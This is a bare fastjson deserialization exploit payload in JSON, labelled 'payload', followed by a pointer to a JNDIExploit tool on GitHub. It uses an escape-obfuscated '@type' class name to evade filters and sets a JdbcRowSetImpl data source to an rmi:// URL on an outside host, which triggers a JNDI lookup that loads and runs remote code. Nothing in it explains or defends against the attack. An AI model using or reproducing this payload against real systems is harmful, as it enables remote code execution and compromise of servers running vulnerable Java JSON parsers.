payload

  1. {
  2. "y7rsl3":{"\u0040t\u0079pe":"java.lang.Class","val":"\u0063om\u002Es\u0075\x6E.row\x73e\u0074.J\x64b\u0063\x52o\x77Se\u0074Imp\u006C"},
  3. "7sl80f":{{
  4. "\u0040t\u0079pe": "com.alibaba.fastjson.JSONObject",
  5. "1p4ixh":
  6. {"\u0040t\u0079pe":"\u0063om\u002Es\u0075\x6E.row\x73e\u0074.J\x64b\u0063\x52o\x77Se\u0074Imp\u006C","dataSourceName":"rmi://i-b364d6-kgyz-z4tq.vwth7z.xyz/i/hcSvqI7U/b364d6/kgyz/z4tq/PQ5P8iBh/","autoCommit":true}
  7. }:{}}
  8. }

工具

https://github.com/Pear1y/JNDIExploit